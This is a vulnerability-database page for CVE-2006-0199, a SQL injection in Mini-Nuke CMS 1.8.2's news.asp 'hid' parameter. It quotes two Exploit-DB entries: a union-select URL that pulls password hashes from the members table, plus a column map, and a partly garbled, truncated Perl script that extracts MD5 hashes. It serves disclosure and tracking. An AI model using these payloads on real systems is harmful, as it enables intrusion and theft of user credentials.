CVE-2006-0199
published 2006-01-13CVE-2006-0199: SQL injection vulnerability in news.asp in Mini-Nuke CMS System 1.8.2 and earlier allows remote attackers to execute arbitrary SQL commands via the hid…
PriorityP341high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.80%
75.8th percentile
SQL injection vulnerability in news.asp in Mini-Nuke CMS System 1.8.2 and earlier allows remote attackers to execute arbitrary SQL commands via the hid parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mini-nuke | cms_system | <= 1.8.2 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
MiniNuke 1.8.2 - Multiple SQL Injections
exploitdb·2006-01-14
CVE-2006-0199 MiniNuke 1.8.2 - Multiple SQL Injections
MiniNuke 1.8.2 - Multiple SQL Injections
---
Contacts:{
ICQ: 10072
MSN/Email: [email protected]
Web: http://www.nukedx.com
}
---
Vendor: MiniNuke (www.miniex.net)
Version: 1.8.2 and prior versions must be affected.
About:Via this method remote attacker can inject SQL query to the news.asp
---
How&Example: GET -> http://[site]/news.asp?Action=Print&hid=[SQLQuery]
http://www.miniex.net/news.asp?Action=Print&hid=66%20union+select+0,sifre,0,0,0,0,0,0,0,0+from+members+where+uye_id=52
Columns of MEMBERS:
uye_id = userid
sifre = md5 password hash
g_soru = secret question.
g_cevap = secret answer
email = mail address
isim = name
icq = ICQ Uin
msn = MSN Sn.
aim = AIM Sn.
meslek = job
cinsiyet = gender
yas = age
url = url
imza = signature
mail_goster = show mail :P
avurl = avatar url
avatar = a
Exploit-DB
MiniNuke 1.8.2 - 'hid' SQL Injection
exploitdb·2006-01-14
CVE-2006-0199 MiniNuke 1.8.2 - 'hid' SQL Injection
MiniNuke 1.8.2 - 'hid' SQL Injection
---
#!/usr/bin/perl
# MiniNuke (www.miniex.net) Version: new( Proto => "tcp",
PeerAddr => $proxyAddr?"$proxyAddr":"$serv",
PeerPort => $proxyPort?"$proxyPort":"80")
|| die "can't connect to: $serv\n";
print $socket "GET $request HTTP/1.1\n";
print $socket "Host: $serv\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "+ Connected!...\n";
while($answer = ) {
if ($answer =~ /([\d,a-f]{32})/) {
print "+ Found! The hash for user $uid: $1\n";
print "----------------------------------\n";
exit(); }
if ($answer =~ /number of columns/) { print "+ Vulnerable! But no result with default querry, so manually change the scrypt;-)...\n";exit(); }
}
print "Exploit failed\n";
print "--------------------------\n";
# milw0rm.com [2006-01
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/fulldisclosure/2006-01/0439.htmlhttp://secunia.com/advisories/18439http://securityreason.com/securityalert/340http://www.nukedx.com/?viewdoc=7http://www.osvdb.org/22384http://www.securityfocus.com/archive/1/421727/100/0/threadedhttp://www.vupen.com/english/advisories/2006/0173https://exchange.xforce.ibmcloud.com/vulnerabilities/24098http://archives.neohapsis.com/archives/fulldisclosure/2006-01/0439.htmlhttp://secunia.com/advisories/18439http://securityreason.com/securityalert/340http://www.nukedx.com/?viewdoc=7http://www.osvdb.org/22384http://www.securityfocus.com/archive/1/421727/100/0/threadedhttp://www.vupen.com/english/advisories/2006/0173https://exchange.xforce.ibmcloud.com/vulnerabilities/24098
2006-01-13
Published